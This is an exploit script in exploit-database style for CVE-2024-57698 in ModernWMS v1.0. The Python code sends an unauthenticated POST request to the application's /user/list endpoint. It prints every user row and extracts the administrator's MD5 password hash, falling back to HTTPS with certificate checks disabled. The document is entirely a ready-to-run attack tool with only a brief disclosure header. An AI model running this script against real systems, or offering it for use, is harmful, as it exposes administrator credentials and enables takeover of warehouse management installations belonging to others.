# Exploit Title: ModernWMS v1.0 - Admin MD5 Password Hash Disclosure - CVE-2024-57698
# Date: 31/12/2024
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/fjykTec/ModernWMS
# Version: 1.0
# CVE-2024-57698
# https://github.com/rodolfomarianocy/

import requests, argparse

def get_hash(res):
    data = res.json()
    admin_row = data['data']['rows']
    print("-----------FULL DATA-----------")
    print(admin_row,'\n')

    for get_hash in admin_row:
        hash = get_hash['auth_string']
    print("ADMIN HASH PASSWORD IN MD5:", hash)
    print("------------------------------------------------------------")

def main(host,port):
    url = "%s:%s/user/list?culture=en-us" % (host, port)
    try:
        res = requests.post("http://"+url, json={'total': '0', 'pageIndex': '1','pageSize': '20'})
        get_hash(res)
    except requests.exceptions.ConnectionError as e:
        print(e)
        print("Connection error in HTTP scheme")
        print("-------------------------------")
        try:
            print("Trying with HTTPS scheme...")
            print("-------------------------------")
            res = requests.post("https://"+url, json={'total': '0', 'pageIndex': '1','pageSize': '20'}, verify=False)
            get_hash(res)
        except requests.exceptions.ConnectionError as e:
            print(e)
            print("Connection error in HTTPS scheme")

parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, usage="python exploit.py --host <ip> --port <port>")
parser.add_argument('--host', dest='host', action='store', required=True, type=str)
parser.add_argument('--port', dest='port', action='store', default=20011, type=str)
args = parser.parse_args()

main(args.host,args.port)